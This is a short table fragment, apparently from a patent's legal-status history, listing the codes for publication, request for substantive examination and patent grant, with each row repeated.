---|---|---|---|
PB01 | Publication | ||
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
SE01 | Entry into force of request for substantive examination | ||
GR01 | Patent grant | ||
GR01 | Patent grant |